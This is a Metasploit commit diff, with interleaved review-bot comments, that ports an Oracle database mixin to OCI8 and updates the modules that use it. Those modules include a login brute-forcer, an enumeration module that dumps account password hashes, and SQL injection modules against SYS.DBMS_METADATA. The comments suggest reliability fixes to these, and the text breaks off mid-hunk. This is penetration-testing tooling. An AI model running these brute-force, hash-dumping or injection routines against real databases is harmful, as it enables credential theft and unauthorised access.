updated oracle mixin and adjusted affected modules. now compatible with ruby 1.8 and 1.9
git-svn-id: file:///home/svn/framework3/trunk@7688 4d416f70-5f16-0410-b530-b9f4589650da
parent
d4f1314025
commit
93d02320cf
|
@ -2,103 +2,147 @@
|
|||
#
|
||||
# This module provides methods for communicating with a host running oracle.
|
||||
# Dependencies:
|
||||
# - Oracle Instant Client
|
||||
# - ruby-dbi
|
||||
# - ruby-oci8
|
||||
# - Oracle Instant Client
|
||||
# - ruby-oci8
|
||||
#
|
||||
# Rory McCune <rorym@nmrconsult.net>
|
||||
# MC <mc@metasploit.com>
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Exploit::ORACLE
|
||||
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('RHOST', [ true, 'The Oracle host.', '']),
|
||||
OptString.new('RPORT', [ true, 'The TNS port.', '1521']),
|
||||
OptString.new('SID', [ true, 'The sid to authenticate with.', 'ORCL']),
|
||||
OptString.new('DBUSER', [ true, 'The username to authenticate with.', 'SCOTT']),
|
||||
OptString.new('DBPASS', [ true, 'The password to authenticate with.', 'TIGER']),
|
||||
OptString.new('RHOST', [ true, 'The Oracle host.', '']),
|
||||
OptString.new('RPORT', [ true, 'The TNS port.', '1521']),
|
||||
OptString.new('SID', [ true, 'The sid to authenticate with.', 'ORCL']),
|
||||
OptString.new('DBUSER', [ true, 'The username to authenticate with.', 'SCOTT']),
|
||||
OptString.new('DBPASS', [ true, 'The password to authenticate with.', 'TIGER']),
|
||||
], Msf::Exploit::ORACLE
|
||||
)
|
||||
|
||||
begin
|
||||
require 'rubygems'
|
||||
gem 'dbi'
|
||||
require 'dbi'
|
||||
@havedbi = true
|
||||
require 'oci8'
|
||||
rescue ::LoadError
|
||||
@havedbi = false
|
||||
end
|
||||
|
||||
if(not @havedbi)
|
||||
begin
|
||||
require 'dbi'
|
||||
@havedbi = true
|
||||
rescue ::LoadError
|
||||
@havedbi = false
|
||||
end
|
||||
print_error("oci8 module not loaded, is installed ok?")
|
||||
raise RuntimeError, "The oci8 module is not available!"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def connect
|
||||
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}...")
|
||||
|
||||
if ( not @havedbi )
|
||||
print_error("The dbi module is not available!")
|
||||
raise RuntimeError, "The dbi module is not available!"
|
||||
# Create a Connection to the Database
|
||||
if datastore['DBUSER'] == 'SYS' || datastore['DBUSER'] == 'SYSTEM'
|
||||
handle = OCI8.new(datastore['DBUSER'],
|
||||
datastore['DBPASS'],
|
||||
"//#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}",
|
||||
:SYSDBA)
|
||||
else
|
||||
handle = OCI8.new(datastore['DBUSER'],
|
||||
datastore['DBPASS'],
|
||||
"//#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
handle = DBI.connect(
|
||||
"DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}",
|
||||
"#{datastore['DBUSER']}",
|
||||
"#{datastore['DBPASS']}"
|
||||
)
|
||||
rescue ::DBI::DatabaseError => e
|
||||
print_error("Oracle DB connection failed: #{e.class} #{e.to_s}")
|
||||
handle.disconnect_all if handle
|
||||
return
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue DBI::InterfaceError
|
||||
print_error("The Oracle Database Instant Client has not been installed")
|
||||
raise RuntimeError, "Missing OCI8 DBI driver"
|
||||
end
|
||||
|
||||
# 23.11 passing a raise call after the print_error, so we get the error message and the error is passed on in case the module needs it (eg, login_brute)
|
||||
rescue ::OCIError => e
|
||||
# print_error("#{e.class} #{e.to_s}")
|
||||
raise
|
||||
end
|
||||
|
||||
def disconnect
|
||||
disconnect_all
|
||||
connect.logoff
|
||||
end
|
||||
|
||||
def prepare_exec(exec)
|
||||
def prepare_exec(sql)
|
||||
begin
|
||||
sploit = connect.prepare(exec)
|
||||
sploit.execute
|
||||
rescue DBI::DatabaseError => e
|
||||
print_status("#{e.to_s}")
|
||||
sploit = connect.parse(sql)
|
||||
rescue ::OCIError => e
|
||||
print_error("#{e.to_s}")
|
||||
return
|
||||
end
|
||||
|
||||
# DEBUG
|
||||
# print_status("did the parse sploit type is " + sploit.type.to_s)
|
||||
begin
|
||||
sploit.each do | data |
|
||||
print_status("#{data.join(",").to_s}")
|
||||
end
|
||||
print_status("Done...")
|
||||
sploit.finish
|
||||
rescue DBI::DatabaseError => e
|
||||
#print_error("#{e.to_s}")
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Done...")
|
||||
else
|
||||
return
|
||||
sploit.exec
|
||||
rescue ::OCIError => e
|
||||
if ( e.to_s =~ /ORA-00942: table or view does not exist/ )
|
||||
print_status("ORA-00942: table or view does not exist")
|
||||
raise RuntimeError, "ORA-00942: table or view does not exist"
|
||||
end
|
||||
print_status e.to_s
|
||||
end
|
||||
|
||||
# The Handling is a little different for certain types of query
|
||||
# Mainly Select needs a fetch statement to get the data
|
||||
# Also return types are a little different (some return rows changed so we can used that)
|
||||
# The case statement could probaby be collapsed a bit but leaving it as is for the moment
|
||||
# in case it's useful later...
|
||||
|
||||
# Select Queries
|
||||
case sploit.type
|
||||
when 1, :select_stmt
|
||||
# Create an array to return to the calling function
|
||||
results = Array.new
|
||||
while r = sploit.fetch()
|
||||
str = r.join(',')
|
||||
# Removed this as it should really be down to the exploit to decide what to print
|
||||
# eg leaving this in messes up oraenum.
|
||||
# print_status(str)
|
||||
results << str
|
||||
end
|
||||
|
||||
return results
|
||||
|
||||
# Update Queries
|
||||
when 2, :update_stmt
|
||||
connect.commit
|
||||
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['UPDATE Successful ' + sploit.row_count.to_s + ' Rows Updated']
|
||||
return result
|
||||
# Delete Queries
|
||||
when 3, :delete_stmt
|
||||
connect.commit
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['DELETE Successful ' + sploit.row_count.to_s + ' Rows Deleted']
|
||||
return result
|
||||
# Insert Queries
|
||||
when 4, :insert_stmt
|
||||
connect.commit
|
||||
# If we were successful our return should be a Fixnum with the number of rows updated
|
||||
result = ['INSERT Successful ' + sploit.row_count.to_s + ' Rows Inserted']
|
||||
return result
|
||||
# Create Queries
|
||||
when 5, :create_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('CREATE successful')
|
||||
end
|
||||
when 6, :drop_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('DROP successful')
|
||||
end
|
||||
when 7, :alter_stmt
|
||||
connect.commit
|
||||
if sploit
|
||||
print_status('Alter successful')
|
||||
end
|
||||
when 8, :begin_stmt
|
||||
connect.commit
|
||||
when 9, :declare_stmt
|
||||
connect.commit
|
||||
else
|
||||
print_status("Didn't match Query Type!")
|
||||
print_status("Query type passed was " + sploit.type.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
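Review bot: `prepare_exec` calls `connect` once for `connect.parse(sql)` and again for `connect.commit` in every DML branch, and `disconnect` is `connect.logoff`, so each call opens a fresh `OCI8` session, the commit runs on a different session than the one that executed the statement, and the earlier sessions are never logged off. Oracle transactions are session-scoped, so the UPDATE/DELETE/INSERT branches report rows changed that were never committed, and modules that call `prepare_exec` in a loop accumulate open sessions on the server. If I read the new side correctly, the fix is to keep the handle in an instance variable so `connect` memoizes it, `disconnect` logs off that handle, and the commit branches reuse the same object; callers that change `datastore['DBUSER']` between attempts already call `disconnect` first, which resets it. Separately, the `rescue ::OCIError` after `sploit.exec` prints the error and falls through to `case sploit.type`, so a failed statement is fetched as if it had succeeded; add `return` after `print_status e.to_s`. Both methods are rewritten below with their interface unchanged.
```ruby
def connect
  return @handle if @handle
  print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}...")
  # … unchanged: OCI8.new call, with :SYSDBA when DBUSER is SYS or SYSTEM …
  @handle = handle
rescue ::OCIError => e
  raise
end

def disconnect
  return unless @handle
  @handle.logoff
  @handle = nil
end
```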
|
|
|
@ -48,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
fd = CSV.foreach(list) do |brute|
|
||||
|
||||
datastore['DBUSER'] = brute[2]
|
||||
datastore['DBPASS'] = brute[3]
|
||||
datastore['DBUSER'] = brute[2].downcase
|
||||
datastore['DBPASS'] = brute[3].downcase
|
||||
|
||||
begin
|
||||
c = connect
|
||||
c.disconnect
|
||||
rescue ::Exception => e
|
||||
|
||||
connect
|
||||
disconnect
|
||||
rescue ::OCIError => e
|
||||
print_error("#{e.class} #{e.to_s}")
|
||||
else
|
||||
if (not e)
|
||||
report_note(
|
||||
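Review bot: `brute[2].downcase` and `brute[3].downcase` raise `NoMethodError` on any CSV row with fewer than four fields or an empty cell, which aborts the whole `CSV.foreach` loop instead of skipping that row; add `next unless brute[2] && brute[3]` before the two assignments. The `if (not e)` inside the `else` clause is always true, because `else` only runs when nothing was rescued and `e` is then `nil`, so the test can be dropped. The return value of `connect` is discarded and `disconnect` is called unconditionally, so a failed connect that does not raise `OCIError` would still be treated as a success. The enclosing `run` method and the `CSV.foreach` block start and end outside the hunk.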
|
|
|
@ -27,37 +27,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
end
|
||||
|
||||
def plsql_query(exec)
|
||||
@dbh ||= connect
|
||||
|
||||
querydata = ""
|
||||
|
||||
sploit = @dbh.prepare(exec)
|
||||
sploit.execute
|
||||
|
||||
begin
|
||||
sploit.each do | data |
|
||||
querydata << ("#{data.join(",").to_s} \n")
|
||||
end
|
||||
sploit.finish
|
||||
rescue DBI::DatabaseError => e
|
||||
#print_error("#{e.to_s}")
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Done...")
|
||||
else
|
||||
return
|
||||
end
|
||||
end
|
||||
return querydata
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
#Get all values from v$parameter
|
||||
query = 'select name,value from v$parameter'
|
||||
vparm = {}
|
||||
params = plsql_query(query)
|
||||
params.each_line do |l|
|
||||
params = prepare_exec(query)
|
||||
params.each do |l|
|
||||
name,value = l.split(",")
|
||||
vparm["#{name}"] = value
|
||||
end
|
||||
|
@ -68,14 +45,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
#Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = plsql_query(query)
|
||||
ver = prepare_exec(query)
|
||||
print_status("The versions of the Components are:")
|
||||
ver.each_line do |v|
|
||||
ver.each do |v|
|
||||
print_status("\t#{v.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
|
||||
end
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
majorrel = ver.scan(/Edition Release (\d*)./)
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Audit Check
|
||||
|
@ -125,11 +103,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
print_status("\tUTL Directory Access is set to #{vparm["utl_file_dir"].strip}") if vparm["utl_file_dir"] != " "
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "UTL_DIR: #{ vparm["utl_file_dir"]}") if not vparm["utl_file_dir"].empty?
|
||||
print_status("\tUTL Directory Access is set to #{vparm["utl_file_dir"]}") if vparm["utl_file_dir"] != " "
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "UTL_DIR: #{ vparm["utl_file_dir"]}") if not vparm["utl_file_dir"]#.empty?
|
||||
|
||||
print_status("\tAudit log is saved at #{vparm["audit_file_dest"].strip}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Log Location: #{ vparm["audit_file_dest"]}") if not vparm["audit_file_dest"].empty?
|
||||
print_status("\tAudit log is saved at #{vparm["audit_file_dest"]}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Log Location: #{ vparm["audit_file_dest"]}") if not vparm["audit_file_dest"]#.empty?
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
|
@ -142,9 +120,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_LOCK_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
lockout = plsql_query(query)
|
||||
print_status("\tCurrent Account Lockout Time is set to #{lockout.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout.chomp}")
|
||||
lockout = prepare_exec(query)
|
||||
print_status("\tCurrent Account Lockout Time is set to #{lockout[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -160,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
failed_logins = plsql_query(query)
|
||||
print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins.chomp}")
|
||||
failed_logins = prepare_exec(query)
|
||||
print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -178,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
grace_time = plsql_query(query)
|
||||
print_status("\tThe Password Grace Time is set to #{grace_time.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time.chomp}")
|
||||
grace_time = prepare_exec(query)
|
||||
print_status("\tThe Password Grace Time is set to #{grace_time[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -196,9 +174,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_LIFE_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passlife_time = plsql_query(query)
|
||||
print_status("\tThe Lifetime of Passwords is set to #{passlife_time.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time.chomp}")
|
||||
passlife_time = prepare_exec(query)
|
||||
print_status("\tThe Lifetime of Passwords is set to #{passlife_time[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -213,9 +191,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_REUSE_TIME'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passreuse = plsql_query(query)
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse.chomp}")
|
||||
passreuse = prepare_exec(query)
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -230,10 +208,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_REUSE_MAX'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passreusemax = plsql_query(query)
|
||||
print_status("\tThe Maximun Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax.chomp}")
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse.chomp}")
|
||||
passreusemax = prepare_exec(query)
|
||||
print_status("\tThe Maximun Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax[0].chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}")
|
||||
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
|
||||
|
||||
rescue => e
|
||||
if e.to_s =~ /ORA-00942: table or view does not exist/
|
||||
|
@ -248,8 +226,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
WHERE resource_name = 'PASSWORD_VERIFY_FUNCTION'
|
||||
AND profile = 'DEFAULT'
|
||||
|
|
||||
passrand = plsql_query(query)
|
||||
if passrand =~ /NULL/
|
||||
passrand = prepare_exec(query)
|
||||
if passrand[0] =~ /NULL/
|
||||
print_status("\tPassword Complexity is not checked")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is not being checked for new passwords")
|
||||
else
|
||||
|
@ -265,6 +243,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
|
||||
begin
|
||||
|
||||
if majorrel.join.to_i < 11
|
||||
|
@ -274,9 +253,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
activeacc = plsql_query(query)
|
||||
activeacc = prepare_exec(query)
|
||||
print_status("Active Accounts on the System in format Username,Hash are:")
|
||||
activeacc.each_line do |aa|
|
||||
activeacc.each do |aa|
|
||||
print_status("\t#{aa.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}")
|
||||
end
|
||||
|
@ -286,9 +265,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
activeacc = plsql_query(query)
|
||||
activeacc = prepare_exec(query)
|
||||
print_status("Active Accounts on the System in format Username,Password,Spare4 are:")
|
||||
activeacc.each_line do |aa|
|
||||
activeacc.each do |aa|
|
||||
print_status("\t#{aa.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}")
|
||||
end
|
||||
|
@ -307,9 +286,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_users
|
||||
WHERE account_status = 'EXPIRED & LOCKED'
|
||||
|
|
||||
disabledacc = plsql_query(query)
|
||||
disabledacc = prepare_exec(query)
|
||||
print_status("Expired or Locked Accounts on the System in format Username,Hash are:")
|
||||
disabledacc.each_line do |da|
|
||||
disabledacc.each do |da|
|
||||
print_status("\t#{da.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}")
|
||||
end
|
||||
|
@ -319,9 +298,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 8 or astatus = 9
|
||||
|
|
||||
disabledacc = plsql_query(query)
|
||||
disabledacc = prepare_exec(query)
|
||||
print_status("Expired or Locked Accounts on the System in format Username,Password,Spare4 are:")
|
||||
disabledacc.each_line do |da|
|
||||
disabledacc.each do |da|
|
||||
print_status("\t#{da.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}")
|
||||
end
|
||||
|
@ -339,9 +318,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_role_privs
|
||||
WHERE granted_role = 'DBA'
|
||||
|
|
||||
dbaacc = plsql_query(query)
|
||||
dbaacc = prepare_exec(query)
|
||||
print_status("Accounts with DBA Privilege in format Username,Hash on the System are:")
|
||||
dbaacc.each_line do |dba|
|
||||
dbaacc.each do |dba|
|
||||
print_status("\t#{dba.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with DBA Priv #{dba.chomp}")
|
||||
end
|
||||
|
@ -358,9 +337,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_sys_privs
|
||||
WHERE privilege = 'ALTER SYSTEM'
|
||||
|
|
||||
altersys = plsql_query(query)
|
||||
altersys = prepare_exec(query)
|
||||
print_status("Accounts with Alter System Privilege on the System are:")
|
||||
altersys.each_line do |as|
|
||||
altersys.each do |as|
|
||||
print_status("\t#{as.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with ALTER SYSTEM Priv #{as.chomp}")
|
||||
end
|
||||
|
@ -377,9 +356,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
FROM dba_sys_privs
|
||||
WHERE privilege = 'JAVA ADMIN'
|
||||
|
|
||||
javaacc = plsql_query(query)
|
||||
javaacc = prepare_exec(query)
|
||||
print_status("Accounts with JAVA ADMIN Privilege on the System are:")
|
||||
javaacc.each_line do |j|
|
||||
javaacc.each do |j|
|
||||
print_status("\t#{j.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with JAVA ADMIN Priv #{j.chomp}")
|
||||
end
|
||||
|
@ -397,9 +376,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
where privilege = 'CREATE LIBRARY'
|
||||
or privilege = 'CREATE ANY'
|
||||
|
|
||||
libpriv = plsql_query(query)
|
||||
libpriv = prepare_exec(query)
|
||||
print_status("Accounts that have CREATE LIBRARY Privilege on the System are:")
|
||||
libpriv.each_line do |lp|
|
||||
libpriv.each do |lp|
|
||||
print_status("\t#{lp.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with CREATE LIBRARY Priv #{lp.chomp}")
|
||||
end
|
||||
|
@ -417,7 +396,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
query = %Q|
|
||||
SELECT * FROM dba_users_with_defpwd
|
||||
|
|
||||
defpwd = plsql_query(query)
|
||||
defpwd = prepare_exec(query)
|
||||
defpwd.each do |dp|
|
||||
print_status("\tThe account #{dp.chomp} has a default password.")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with Default Password #{dp.chomp}")
|
||||
|
@ -430,9 +409,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
where password != 'null' and type# = 1
|
||||
|
|
||||
ordfltpss = "#{File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_hashes.txt")}"
|
||||
returnedstring = plsql_query(query)
|
||||
returnedstring = prepare_exec(query)
|
||||
accts = {}
|
||||
returnedstring.each_line do |record|
|
||||
returnedstring.each do |record|
|
||||
user,pass = record.split(",")
|
||||
accts["#{pass.chomp}"] = "#{user}"
|
||||
end
|
||||
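Review bot: `prepare_exec` returns `nil` when the parse fails and an empty array when a query yields no rows, so `params.each`, `ver[0].scan(...)` and every `lockout[0].chomp`-style access in this section raises `NoMethodError` in those cases; the surrounding `rescue => e` then compares an unrelated message against `/ORA-00942/` and the real cause is lost. Guard each result once, e.g. `lockout = prepare_exec(query) || []` followed by `lockout.first.to_s.chomp`, and check `ver.nil? || ver.empty?` before `ver[0].scan`. Separately, `report_note(...) if not vparm["utl_file_dir"]#.empty?` and the matching `audit_file_dest` line comment out the `.empty?` call, leaving `if not vparm["utl_file_dir"]`, which records the note only when the value is `nil` — the inverse of the intent; write `if vparm["utl_file_dir"] && !vparm["utl_file_dir"].empty?` on both lines. The enclosing `run` method and its `begin`/`rescue` blocks start and end outside these hunks.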
|
|
|
@ -37,8 +37,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
query = datastore['SQL']
|
||||
|
||||
begin
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
prepare_exec(query)
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
result = prepare_exec(query)
|
||||
#Need this if 'cause some statements won't return anything
|
||||
if result
|
||||
result.each do |line|
|
||||
print_status(line)
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
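Review bot: `rescue => e` followed by a bare `return` swallows every `StandardError` raised by `prepare_exec`, including the `RuntimeError` the mixin raises for ORA-00942 and presumably the `OCIError` it re-raises from `connect`, so a failed statement produces no output at all. Print the cause before returning, `print_error("#{e.class}: #{e}")`, or drop the unused `e`. The `if result` guard only matters when `prepare_exec` returned `nil` on a parse error, since the DML branches return a one-element array of status strings; the comment `#Need this if 'cause some statements won't return anything` would be more accurate as `# prepare_exec returns nil when the statement fails to parse`. The enclosing `run` method starts and ends outside the hunk.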
|
|
|
@ -49,19 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
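Review bot: With the `begin`/`rescue ::OCIError` wrapper removed, `prepare_exec(package)` raising (the mixin re-raises `OCIError` and raises `RuntimeError` on ORA-00942) now skips the `print_status("Removing function …")` and `prepare_exec(clean)` lines, so the function created by `prepare_exec(function)` is left behind on the target. Wrap the injection call so cleanup always runs: `begin` before the "Attempting sql injection" line, `ensure` before the "Removing function" line, and `end` after `prepare_exec(clean)`. The same pattern applies to the GET_XML, OPEN, COMPRESSWORKSPACE and ROLLBACKWORKSPACE sections below. Note that `prepare_exec(clean)` can itself raise inside `ensure` and mask the original error; rescuing it there with a `print_error` is enough. The enclosing `run` method starts outside the hunk.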
|
|
|
@ -49,19 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
end
|
||||
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...")
|
||||
prepare_exec(package)
|
||||
|
||||
print_status("Removing function '#{name}'...")
|
||||
prepare_exec(clean)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -49,19 +49,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
clean = "drop function #{name}"
|
||||
|
||||
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
|
||||
begin
|
||||
print_status("Sending function...")
|
||||
prepare_exec(function)
|
||||
rescue => e
|
||||
return
|
||||
print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
|
||||
prepare_exec(package)
|
||||
rescue ::OCIError => e
|
||||
if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
|
||||
print_status("Removing function '#{name}'...")
